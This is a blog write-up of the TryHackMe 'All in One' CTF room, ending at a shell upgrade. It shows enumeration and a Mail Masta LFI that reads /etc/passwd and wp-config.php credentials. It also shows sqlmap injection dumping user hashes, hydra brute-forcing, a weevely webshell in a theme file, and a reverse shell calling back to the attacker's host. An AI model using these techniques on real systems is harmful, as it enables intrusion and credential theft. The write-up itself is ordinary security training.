---
layout: post
title: "All in One - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - writeups
  - thm
  - web
  - wordpress
  - eop
  - lfi
  - sqli
  - system
date: 2020/12/13 20:32:00
thumbnail: /images/TryHackMe/all_in_one.png
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** All in One
- **Profile:** [tryhackme.com](https://tryhackme.com/room/allinonemj)
- **Difficulty:** Easy
- **Description**: This is a fun box where you will get to exploit the system in several ways. Few intended and unintended paths to getting user and root access.

![All in One](/images/TryHackMe/all_in_one.png)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S xmlrpc-bruteforcer nmap sqlmap ffuf wpscan fingerprinter haiti john hydra weevely pwncat
```

## Network enumeration

```
# Nmap 7.91 scan initiated Sun Dec 13 17:28:29 2020 as: nmap -sSVC -p- -v -oA nmap_scan 10.10.92.144
Nmap scan report for 10.10.92.144
Host is up (0.036s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.9.19.77
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA)
|   256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA)
|_  256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 13 17:29:46 2020 -- 1 IP address (1 host up) scanned in 76.20 seconds
```

## Web enumeration

```
$ ffuf -u http://10.10.92.144/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories-lowercase.txt -e .txt,.php -fc 403
...
wordpress               [Status: 301, Size: 316, Words: 20, Lines: 10]
                        [Status: 200, Size: 10918, Words: 3499, Lines: 376]
:: Progress: [53310/53310] :: Job [1/1] :: 559 req/sec :: Duration: [0:02:04] :: Errors: 0 ::
```

http://10.10.92.144/wordpress/

```
$ ffuf -u http://10.10.92.144/wordpress/FUZZ -c -w /usr/share/seclists/Discovery/Web-Content/raft-small-files-lowercase.txt -fc 403
...
license.txt             [Status: 200, Size: 19915, Words: 3331, Lines: 385]
index.php               [Status: 301, Size: 0, Words: 1, Lines: 1]
readme.html             [Status: 200, Size: 7278, Words: 740, Lines: 98]
wp-config.php           [Status: 200, Size: 0, Words: 1, Lines: 1]
wp-trackback.php        [Status: 200, Size: 135, Words: 11, Lines: 5]
wp-cron.php             [Status: 200, Size: 0, Words: 1, Lines: 1]
wp-blog-header.php      [Status: 200, Size: 0, Words: 1, Lines: 1]
.                       [Status: 301, Size: 0, Words: 1, Lines: 1]
wp-links-opml.php       [Status: 200, Size: 225, Words: 14, Lines: 12]
wp-load.php             [Status: 200, Size: 0, Words: 1, Lines: 1]
wp-signup.php           [Status: 302, Size: 0, Words: 1, Lines: 1]
wp-activate.php         [Status: 302, Size: 0, Words: 1, Lines: 1]
:: Progress: [10848/10848] :: Job [1/1] :: 323 req/sec :: Duration: [0:00:32] :: Errors: 2 ::
```

Ok let's see the version of wordpress:

```
$ fingerprinter -a wordpress -f http://10.10.92.144/wordpress/
...
Very likely to be v5.5.1
```

Let's find vulnerabilities with WPscan, but before that we need an API token:

`~/.wpscan/scan.yml`

```yaml
cli_options:
  api_token: edited
```

Now let's scan:

```
$ wpscan --url http://10.10.92.144/wordpress/ --no-banner
...
[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.92.144/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
 |  - http://10.10.92.144/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
 |
 | [!] 8 vulnerabilities identified:
 |
 | [!] Title: WordPress < 5.5.2 - Hardening Deserialization Requests
 |     Fixed in: 5.5.2
 |     References:
 |      - https://wpscan.com/vulnerability/10446
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28032
 |      - https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/add6bedf3a53b647d0ebda2970057912d3cd79d3
 |      - https://blog.wpscan.com/2020/10/30/wordpress-5.5.2-security-release.html
 |
 | [!] Title: WordPress < 5.5.2 - Disable Spam Embeds from Disabled Sites on a Multisite Network
 |     Fixed in: 5.5.2
 |     References:
 |      - https://wpscan.com/vulnerability/10447
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28033
 |      - https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/
 |      - https://blog.wpscan.com/2020/10/30/wordpress-5.5.2-security-release.html
 |
 | [!] Title: WordPress < 5.5.2 - Cross-Site Scripting (XSS) via Global Variables
 |     Fixed in: 5.5.2
 |     References:
 |      - https://wpscan.com/vulnerability/10448
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28034
 |      - https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/
 |      - https://blog.wpscan.com/2020/10/30/wordpress-5.5.2-security-release.html
 |
 | [!] Title: WordPress < 5.5.2 - XML-RPC Privilege Escalation
 |     Fixed in: 5.5.2
 |     References:
 |      - https://wpscan.com/vulnerability/10449
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28035
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28036
 |      - https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/c9e6b98968025b1629015998d12c3102165a7d32
 |      - https://blog.wpscan.com/2020/10/30/wordpress-5.5.2-security-release.html
 |
 | [!] Title: WordPress < 5.5.2 - Unauthenticated DoS Attack to RCE
 |     Fixed in: 5.5.2
 |     References:
 |      - https://wpscan.com/vulnerability/10450
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28037
 |      - https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/2ca15d1e5ce70493c5c0c096ca0c76503d6da07c
 |      - https://blog.wpscan.com/2020/10/30/wordpress-5.5.2-security-release.html
 |      - https://threatpost.com/wordpress-patches-rce-bug/160812/
 |
 | [!] Title: WordPress < 5.5.2 - Stored XSS in Post Slugs
 |     Fixed in: 5.5.2
 |     References:
 |      - https://wpscan.com/vulnerability/10451
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28038
 |      - https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/
 |      - https://blog.wpscan.com/2020/10/30/wordpress-5.5.2-security-release.html
 |
 | [!] Title: WordPress < 5.5.2 - Protected Meta That Could Lead to Arbitrary File Deletion
 |     Fixed in: 5.5.2
 |     References:
 |      - https://wpscan.com/vulnerability/10452
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28039
 |      - https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/d5ddd6d4be1bc9fd16b7796842e6fb26315705ad
 |      - https://blog.wpscan.com/2020/10/30/wordpress-5.5.2-security-release.html
 |
 | [!] Title: WordPress < 5.5.2 - Cross-Site Request Forgery (CSRF) to Change Theme Background
 |     Fixed in: 5.5.2
 |     References:
 |      - https://wpscan.com/vulnerability/10454
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28040
 |      - https://wordpress.org/news/2020/10/wordpress-5-5-2-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/cbcc595974d5aaa025ca55625bf68ef286bd8b41
 |      - https://blog.wpscan.com/2020/10/30/wordpress-5.5.2-security-release.html

[+] WordPress theme in use: twentytwenty
 | Location: http://10.10.92.144/wordpress/wp-content/themes/twentytwenty/
 | Last Updated: 2020-12-09T00:00:00.000Z
 | Readme: http://10.10.92.144/wordpress/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 1.6
 | Style URL: http://10.10.92.144/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.92.144/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://10.10.92.144/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
 |     References:
 |      - https://wpscan.com/vulnerability/8609
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956
 |      - https://www.exploit-db.com/exploits/40290/
 |      - https://cxsecurity.com/issue/WLB-2016080220
 |
 | [!] Title: Mail Masta 1.0 - Multiple SQL Injection
 |     References:
 |      - https://wpscan.com/vulnerability/8740
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6095
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6096
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6097
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6098
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6570
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6571
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6572
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6573
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6574
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6575
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6576
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6577
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6578
 |      - https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin
```

## Web exploitation

Let's try the LFI:

`http://10.10.92.144/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd`

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
elyana:x:1000:1000:Elyana:/home/elyana:/bin/bash
mysql:x:110:113:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
ftp:x:111:115:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
```

Let's try the SQLi too: https://www.exploit-db.com/exploits/41438

```
$ sqlmap -u http://10.10.92.144/wordpress/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0&pl=/var/www/html/wordpress/wp-load.php -p list_id --dbms mysql
...
---
Parameter: list_id (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: list_id=0 AND (SELECT 6753 FROM (SELECT(SLEEP(5)))neUT)&pl=/var/www/html/wordpress/wp-load.php

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: list_id=0 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71626a7071,0x49486d5263485a6d4c484d43416b4c6a487a4663516a6264766244476467636c6848476e64594d79,0x71707a7871),NULL,NULL,NULL,NULL,NULL-- -&pl=/var/www/html/wordpress/wp-load.php
---

$ sqlmap -u http://10.10.92.144/wordpress/wp-content/plugins/mail-masta/inc/lists/csvexport.php\?list_id\=0\&pl\=/var/www/html/wordpress/wp-load.php -p list_id --dbms mysql -D wordpress -T wp_users --dump
...
Database: wordpress
Table: wp_users
[1 entry]
+----+--------------------------------+------------------------------------+---------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url                       | user_pass                          | user_email    | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |
+----+--------------------------------+------------------------------------+---------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1  | http://192.168.8.110/wordpress | $P$BhwVLVLk5fGRPyoEfmBfVs82bY7fSq1 | none@none.com | elyana     | 0           | elyana       | elyana        | 2020-10-05 19:55:50 | <blank>             |
+----+--------------------------------+------------------------------------+---------------+------------+-------------+--------------+---------------+---------------------+---------------------+

$ haiti '$P$BhwVLVLk5fGRPyoEfmBfVs82bY7fSq1'
Wordpress ≥ v2.6.2 [HC: 400] [JtR: phpass]
Joomla ≥ v2.5.18 [HC: 400] [JtR: phpass]
PHPass' Portable Hash [HC: 400] [JtR: phpass]

$ john hash.txt --wordlist=/usr/share/wordlists/passwords/rockyou.txt --format=phpass
```

The password wasn't cracked.

Let's try XML-RPC bruteforce:

```
$ xmlrpc-bruteforcer http://10.10.92.144/wordpress/xmlrpc.php /usr/share/wordlists/passwords/rockyou.txt elyana

---------------Examining Target--------------------

Target is NOT vulnerable for Brute Forcing.
```

SSH bruteforce is too low:

```
$ hydra -l elyana -P /usr/share/wordlists/passwords/rockyou.txt 10.10.92.144 -t 4 ssh
```

Let's try to BF via web:

```
$ hydra -l elyana -P /usr/share/wordlists/passwords/rockyou.txt 10.10.92.144 http-post-form '/wordpress/wp-login.php:log=^USER^&pwd=^PASS^:F=incorrect'
```

### LFI

Let's try filters on the LFI:

http://10.10.92.144/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=php://filter/convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php

```
$ printf %s 'PD9waHANCi8qKg0KICogVGhlIGJhc2UgY29uZmlndXJhdGlvbiBmb3IgV29yZFByZXNzDQogKg0KICogVGhlIHdwLWNvbmZpZy5waHAgY3JlYXRpb24gc2NyaXB0IHVzZXMgdGhpcyBmaWxlIGR1cmluZyB0aGUNCiAqIGluc3RhbGxhdGlvbi4gWW91IGRvbid0IGhhdmUgdG8gdXNlIHRoZSB3ZWI
gc2l0ZSwgeW91IGNhbg0KICogY29weSB0aGlzIGZpbGUgdG8gIndwLWNvbmZpZy5waHAiIGFuZCBmaWxsIGluIHRoZSB2YWx1ZXMuDQogKg0KICogVGhpcyBmaWxlIGNvbnRhaW5zIHRoZSBmb2xsb3dpbmcgY29uZmlndXJhdGlvbnM6DQogKg0KICogKiBNeVNRTCBzZXR0aW5ncw0KICogKiBTZWNyZXQga2V5cw0
KICogKiBEYXRhYmFzZSB0YWJsZSBwcmVmaXgNCiAqICogQUJTUEFUSA0KICoNCiAqIEBsaW5rIGh0dHBzOi8vd29yZHByZXNzLm9yZy9zdXBwb3J0L2FydGljbGUvZWRpdGluZy13cC1jb25maWctcGhwLw0KICoNCiAqIEBwYWNrYWdlIFdvcmRQcmVzcw0KICovDQoNCi8vICoqIE15U1FMIHNldHRpbmdzIC0gWW9
1IGNhbiBnZXQgdGhpcyBpbmZvIGZyb20geW91ciB3ZWIgaG9zdCAqKiAvLw0KLyoqIFRoZSBuYW1lIG9mIHRoZSBkYXRhYmFzZSBmb3IgV29yZFByZXNzICovDQpkZWZpbmUoICdEQl9OQU1FJywgJ3dvcmRwcmVzcycgKTsNCg0KLyoqIE15U1FMIGRhdGFiYXNlIHVzZXJuYW1lICovDQpkZWZpbmUoICdEQl9VU0V
SJywgJ2VseWFuYScgKTsNCg0KLyoqIE15U1FMIGRhdGFiYXNlIHBhc3N3b3JkICovDQpkZWZpbmUoICdEQl9QQVNTV09SRCcsICdIQGNrbWVAMTIzJyApOw0KDQovKiogTXlTUUwgaG9zdG5hbWUgKi8NCmRlZmluZSggJ0RCX0hPU1QnLCAnbG9jYWxob3N0JyApOw0KDQovKiogRGF0YWJhc2UgQ2hhcnNldCB0byB
1c2UgaW4gY3JlYXRpbmcgZGF0YWJhc2UgdGFibGVzLiAqLw0KZGVmaW5lKCAnREJfQ0hBUlNFVCcsICd1dGY4bWI0JyApOw0KDQovKiogVGhlIERhdGFiYXNlIENvbGxhdGUgdHlwZS4gRG9uJ3QgY2hhbmdlIHRoaXMgaWYgaW4gZG91YnQuICovDQpkZWZpbmUoICdEQl9DT0xMQVRFJywgJycgKTsNCg0Kd29yZHB
yZXNzOw0KZGVmaW5lKCAnV1BfU0lURVVSTCcsICdodHRwOi8vJyAuJF9TRVJWRVJbJ0hUVFBfSE9TVCddLicvd29yZHByZXNzJyk7DQpkZWZpbmUoICdXUF9IT01FJywgJ2h0dHA6Ly8nIC4kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJy93b3JkcHJlc3MnKTsNCg0KLyoqI0ArDQogKiBBdXRoZW50aWNhdGlvbiBVbml
xdWUgS2V5cyBhbmQgU2FsdHMuDQogKg0KICogQ2hhbmdlIHRoZXNlIHRvIGRpZmZlcmVudCB1bmlxdWUgcGhyYXNlcyENCiAqIFlvdSBjYW4gZ2VuZXJhdGUgdGhlc2UgdXNpbmcgdGhlIHtAbGluayBodHRwczovL2FwaS53b3JkcHJlc3Mub3JnL3NlY3JldC1rZXkvMS4xL3NhbHQvIFdvcmRQcmVzcy5vcmcgc2V
jcmV0LWtleSBzZXJ2aWNlfQ0KICogWW91IGNhbiBjaGFuZ2UgdGhlc2UgYXQgYW55IHBvaW50IGluIHRpbWUgdG8gaW52YWxpZGF0ZSBhbGwgZXhpc3RpbmcgY29va2llcy4gVGhpcyB3aWxsIGZvcmNlIGFsbCB1c2VycyB0byBoYXZlIHRvIGxvZyBpbiBhZ2Fpbi4NCiAqDQogKiBAc2luY2UgMi42LjANCiAqLw0
KZGVmaW5lKCAnQVVUSF9LRVknLCAgICAgICAgICd6a1klbSVSRlliOnUsL2xxLWlafjhmakVOZElhU2I9Xms8M1pyLzBEaUxacVB4enxBdXFsaTZsWi05RFJhZ0pQJyApOw0KZGVmaW5lKCAnU0VDVVJFX0FVVEhfS0VZJywgICdpQVlhazxfJn52OW8re2JAUlBSNjJSOSBUeS0gNlUteUg1YmFVRHs7bmRTaUNbXXF
vc3hTQHNjdSZTKWQkSFtUJyApOw0KZGVmaW5lKCAnTE9HR0VEX0lOX0tFWScsICAgICdhUGRfKnNCZj1adWMrK2FdNVZnOT1QfnUwM1EsenZwW2VVZS99KUQ9Ok55aFVZe0tYUl10N300MlVwa1tyNz9zJyApOw0KZGVmaW5lKCAnTk9OQ0VfS0VZJywgICAgICAgICdAaTtUKHt4Vi9mdkUhcyteZGU3ZTRMWDN9TlR
AIGo7YjRbejNfZkZKYmJXKG5vIDNPN0ZAc3gwIW95KE9gaCNNJyApOw0KZGVmaW5lKCAnQVVUSF9TQUxUJywgICAgICAgICdCIEFUQGk+KiBOI1c8biEqfGtGZE1uUU4pPl49XihpSHA4VXZnPH4ySH56Rl1pZHlRPXtAfTF9KnJ7bFowLFdZJyApOw0KZGVmaW5lKCAnU0VDVVJFX0FVVEhfU0FMVCcsICdoeDhJOit
UejhuMzM1V2htels+JFVaOzhyUVlLPlJ6XVZHeUJkbW83PSZHWiFMTyxwQU1zXWYhelZ9eG46NEFQJyApOw0KZGVmaW5lKCAnTE9HR0VEX0lOX1NBTFQnLCAgICd4N3I+fGMwTUxecztTdzIqVSF4LntgNUQ6UDF9Vz0gL2Npe1E8dEVNPXRyU3YxZWVkfF9mc0xgeV5TLFhJPFJZJyApOw0KZGVmaW5lKCAnTk9OQ0V
fU0FMVCcsICAgICAgICd2T2IlV3R5fSR6eDlgfD40NUlwQHN5WiBdRzpDM3xTZEQtUDM8e1lQOi5qUERYKUh9d0dtMSpKXk1TYnMkMWB8JyApOw0KDQovKiojQC0qLw0KDQovKioNCiAqIFdvcmRQcmVzcyBEYXRhYmFzZSBUYWJsZSBwcmVmaXguDQogKg0KICogWW91IGNhbiBoYXZlIG11bHRpcGxlIGluc3RhbGx
hdGlvbnMgaW4gb25lIGRhdGFiYXNlIGlmIHlvdSBnaXZlIGVhY2gNCiAqIGEgdW5pcXVlIHByZWZpeC4gT25seSBudW1iZXJzLCBsZXR0ZXJzLCBhbmQgdW5kZXJzY29yZXMgcGxlYXNlIQ0KICovDQokdGFibGVfcHJlZml4ID0gJ3dwXyc7DQoNCi8qKg0KICogRm9yIGRldmVsb3BlcnM6IFdvcmRQcmVzcyBkZWJ
1Z2dpbmcgbW9kZS4NCiAqDQogKiBDaGFuZ2UgdGhpcyB0byB0cnVlIHRvIGVuYWJsZSB0aGUgZGlzcGxheSBvZiBub3RpY2VzIGR1cmluZyBkZXZlbG9wbWVudC4NCiAqIEl0IGlzIHN0cm9uZ2x5IHJlY29tbWVuZGVkIHRoYXQgcGx1Z2luIGFuZCB0aGVtZSBkZXZlbG9wZXJzIHVzZSBXUF9ERUJVRw0KICogaW4
gdGhlaXIgZGV2ZWxvcG1lbnQgZW52aXJvbm1lbnRzLg0KICoNCiAqIEZvciBpbmZvcm1hdGlvbiBvbiBvdGhlciBjb25zdGFudHMgdGhhdCBjYW4gYmUgdXNlZCBmb3IgZGVidWdnaW5nLA0KICogdmlzaXQgdGhlIGRvY3VtZW50YXRpb24uDQogKg0KICogQGxpbmsgaHR0cHM6Ly93b3JkcHJlc3Mub3JnL3N1cHB
vcnQvYXJ0aWNsZS9kZWJ1Z2dpbmctaW4td29yZHByZXNzLw0KICovDQpkZWZpbmUoICdXUF9ERUJVRycsIGZhbHNlICk7DQoNCi8qIFRoYXQncyBhbGwsIHN0b3AgZWRpdGluZyEgSGFwcHkgcHVibGlzaGluZy4gKi8NCg0KLyoqIEFic29sdXRlIHBhdGggdG8gdGhlIFdvcmRQcmVzcyBkaXJlY3RvcnkuICovDQp
pZiAoICEgZGVmaW5lZCggJ0FCU1BBVEgnICkgKSB7DQoJZGVmaW5lKCAnQUJTUEFUSCcsIF9fRElSX18gLiAnLycgKTsNCn0NCg0KLyoqIFNldHMgdXAgV29yZFByZXNzIHZhcnMgYW5kIGluY2x1ZGVkIGZpbGVzLiAqLw0KcmVxdWlyZV9vbmNlIEFCU1BBVEggLiAnd3Atc2V0dGluZ3MucGhwJzsNCg==' | bas
e64 -d
```

Result:

```php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://wordpress.org/support/article/editing-wp-config-php/
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'elyana' );

/** MySQL database password */
define( 'DB_PASSWORD', 'H@ckme@123' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

wordpress;
define( 'WP_SITEURL', 'http://' .$_SERVER['HTTP_HOST'].'/wordpress');
define( 'WP_HOME', 'http://' .$_SERVER['HTTP_HOST'].'/wordpress');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define( 'AUTH_KEY',         'zkY%m%RFYb:u,/lq-iZ~8fjENdIaSb=^k<3Zr/0DiLZqPxz|Auqli6lZ-9DRagJP' );
define( 'SECURE_AUTH_KEY',  'iAYak<_&~v9o+{b@RPR62R9 Ty- 6U-yH5baUD{;ndSiC[]qosxS@scu&S)d$H[T' );
define( 'LOGGED_IN_KEY',    'aPd_*sBf=Zuc++a]5Vg9=P~u03Q,zvp[eUe/})D=:NyhUY{KXR]t7}42Upk[r7?s' );
define( 'NONCE_KEY',        '@i;T({xV/fvE!s+^de7e4LX3}NT@ j;b4[z3_fFJbbW(no 3O7F@sx0!oy(O`h#M' );
define( 'AUTH_SALT',        'B AT@i>* N#W<n!*|kFdMnQN)>^=^(iHp8Uvg<~2H~zF]idyQ={@}1}*r{lZ0,WY' );
define( 'SECURE_AUTH_SALT', 'hx8I:+Tz8n335Whmz[>$UZ;8rQYK>Rz]VGyBdmo7=&GZ!LO,pAMs]f!zV}xn:4AP' );
define( 'LOGGED_IN_SALT',   'x7r>|c0ML^s;Sw2*U!x.{`5D:P1}W= /ci{Q<tEM=trSv1eed|_fsL`y^S,XI<RY' );
define( 'NONCE_SALT',       'vOb%Wty}$zx9`|>45Ip@syZ ]G:C3|SdD-P3<{YP:.jPDX)H}wGm1*J^MSbs$1`|' );

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the documentation.
 *
 * @link https://wordpress.org/support/article/debugging-in-wordpress/
 */
define( 'WP_DEBUG', false );

/* That's all, stop editing! Happy publishing. */

/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
        define( 'ABSPATH', __DIR__ . '/' );
}

/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
```

Maybe the MySQL creds are re-used for the WP account: `elyana` / `H@ckme@123`.

### Webshell file upload

Now let's upload a webshell at http://10.10.92.144/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentytwenty

```
$ weevely generate noraj agent.php
```

Webshell at: http://10.10.92.144/wordpress/wp-content/themes/twentytwenty/404.php

```
$ weevely http://10.10.92.144/wordpress/wp-content/themes/twentytwenty/404.php noraj

[+] weevely 4.0.1

[+] Target:     10.10.92.144
[+] Session:    /home/noraj/.weevely/sessions/10.10.92.144/404_0.session

[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.

weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@elyana:/var/www/html/wordpress/wp-content/themes/twentytwenty $
```

### Reverse shell deployment

Let's use a weevely module:

```
:backdoor_reversetcp 10.9.19.77 8080 -s bash
```

```
$ pwncat -l 8080 -vv
INFO: Listening on :::8080 (family 10/IPv6, TCP)
INFO: Listening on 0.0.0.0:8080 (family 2/IPv4, TCP)
INFO: Client connected from 10.10.92.144:51076 (family 2/IPv4, TCP)
bash: cannot set terminal process group (996): Inappropriate ioctl for device
bash: no job control in this shell
bash-4.4$
```

### Shell upgrade

```
bash-4.4$ export TERM=xterm
